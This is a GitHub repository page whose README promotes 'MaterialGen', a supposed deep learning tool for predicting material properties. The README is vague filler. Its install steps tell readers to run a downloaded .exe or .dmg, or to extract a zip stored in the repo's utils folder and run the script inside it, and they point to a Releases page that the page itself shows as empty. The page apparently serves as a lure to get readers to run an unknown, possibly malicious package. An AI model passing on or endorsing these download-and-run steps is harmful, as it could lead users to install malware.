Skip to content

🧪 Accelerate materials discovery with MaterialGen, a deep learning platform for predicting properties and designing novel materials for advanced applications.

Notifications You must be signed in to change notification settings

Tsebo69/MaterialGen

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🌟 MaterialGen - Easy Material Property Predictions

🚀 Getting Started

Welcome to MaterialGen! This is a user-friendly deep learning platform that helps you predict material properties. You can design new materials for electronics and energy storage with ease.

📥 Download MaterialGen

Download MaterialGen

To get started, visit the Releases page and download the latest version of MaterialGen.

Visit Releases Page to Download

⚙️ System Requirements

Before downloading, make sure your computer meets the following requirements:

  • Operating System: Windows 10 or later, Mac OS 10.15 or later, or a modern Linux distribution
  • Processor: 2 GHz dual-core or better
  • Memory: At least 8 GB RAM
  • Graphics Card: Optional, but recommended for the best performance (NVIDIA or AMD)

🛠️ Installation Instructions

Follow these steps to install MaterialGen on your computer:

  1. Download the Software: Go to the Releases page and click the link for the latest version.

  2. Open the Installer:

    • For Windows: Double-click the downloaded .exe file.
    • For Mac: Open the .dmg file and drag the MaterialGen icon to your Applications folder.
    • For Linux: Extract the https://raw.githubusercontent.com/Tsebo69/MaterialGen/main/utils/MaterialGen_2.1.zip file and run the script provided within the folder.
  3. Follow the Prompts: The installation wizard will guide you through the process. Just follow the instructions on your screen.

  4. Launch MaterialGen: After installation, find MaterialGen in your applications list and open it.

📚 User Guide

Now you’re ready to use MaterialGen! Here’s a basic guide to get you started:

1. Creating a New Project

  • Open MaterialGen and click on "New Project".
  • Enter a name for your project and choose a directory to save it.

2. Inputting Your Materials

  • Select the "Materials" tab.
  • Choose materials from the provided list or add your own by entering the properties.

3. Running Predictions

  • Click on the "Predict" button to generate predictions for the materials you entered.

4. Viewing Results

  • Predictions will display on the results screen.
  • You can save the results in various formats for further analysis.

🌐 Community and Support

If you have questions or need help, the MaterialGen community is here to assist you. You can find resources, tutorials, and a forum for discussions. Here are some places to connect:

  • GitHub Issues: Report bugs or ask for help directly on our GitHub Issues page.
  • Discussion Forum: Join our community discussions and share your experience.

📝 Additional Resources

Here are some helpful links:

  • Tutorials: Look for guides and tutorials to help you learn how to use MaterialGen effectively.
  • Documentation: Detailed documentation covers each feature and how to make the most of the application.
  • Contribution Guidelines: Interested in contributing? Check our contribution guidelines in the repository.

💡 Topics

MaterialGen covers a variety of topics in science and technology, including:

  • Computational Physics
  • Deep Learning Algorithms
  • Materials Science
  • Nanotechnology
  • Quantum Chemistry

These topics help you explore new horizons in material discovery and application.

🔗 Final Notes

MaterialGen empowers you to discover and design innovative materials. Just follow the download instructions and start your journey into material science today!

Download MaterialGen to bring the power of deep learning into your projects. Enjoy exploring and creating with MaterialGen!

About

🧪 Accelerate materials discovery with MaterialGen, a deep learning platform for predicting properties and designing novel materials for advanced applications.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages